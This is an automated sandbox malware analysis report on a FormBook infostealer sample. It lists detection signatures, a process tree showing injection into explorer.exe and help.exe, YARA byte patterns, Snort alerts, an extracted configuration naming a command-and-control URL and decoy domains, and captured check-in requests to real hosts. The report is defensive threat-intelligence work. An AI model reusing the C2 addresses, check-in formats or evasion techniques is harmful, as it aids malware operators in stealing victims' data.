Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report KY4cmAI0jU.exe

Overview

General Information

Sample Name:KY4cmAI0jU.exe
Analysis ID:433078
MD5:8c35ac8d43f7e59105902fa16114144e
SHA1:c1a0e5de1121e55c22649182c923b41efd4e2848
SHA256:1a08fc838c4ebab6b986b6010e2074a05c29916cd38096e7f7d26a6455917508
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KY4cmAI0jU.exe (PID: 2128 cmdline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
    • KY4cmAI0jU.exe (PID: 1632 cmdline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 5380 cmdline: /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.KY4cmAI0jU.exe.2170000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.KY4cmAI0jU.exe.2170000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.KY4cmAI0jU.exe.2170000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        1.1.KY4cmAI0jU.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.KY4cmAI0jU.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: KY4cmAI0jU.exeVirustotal: Detection: 34%Perma Link
          Source: KY4cmAI0jU.exeMetadefender: Detection: 17%Perma Link
          Source: KY4cmAI0jU.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: KY4cmAI0jU.exeJoe Sandbox ML: detected
          Source: 6.2.help.exe.3407960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.KY4cmAI0jU.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.KY4cmAI0jU.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.help.exe.9fd7e8.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: KY4cmAI0jU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: KY4cmAI0jU.exe, 00000000.00000003.213745090.00000000099C0000.00000004.00000001.sdmp, KY4cmAI0jU.exe, 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, help.exe, 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: KY4cmAI0jU.exe, help.exe
          Source: Binary string: help.pdbGCTL source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop ebx1_2_00406A9A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi1_2_00415659
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi1_2_00415671
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop ebx1_1_00406A9A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi1_1_00415659
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 4x nop then pop edi1_1_00415671
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx6_2_00566A9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi6_2_00575659
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi6_2_00575671

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.alberthospice.com/sh2m/
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.take-me-bergen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.starflexacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ladorreguita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.candydulce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.insurancedowntown.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ezonkorea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.dndemystified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.143.65.214 3.143.65.214
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.take-me-bergen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.starflexacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ladorreguita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.candydulce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.insurancedowntown.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.ezonkorea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.dndemystified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1Host: www.meganfantastic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.take-me-bergen.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Jun 2021 07:03:07 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000002.00000000.235645842.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: KY4cmAI0jU.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: KY4cmAI0jU.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
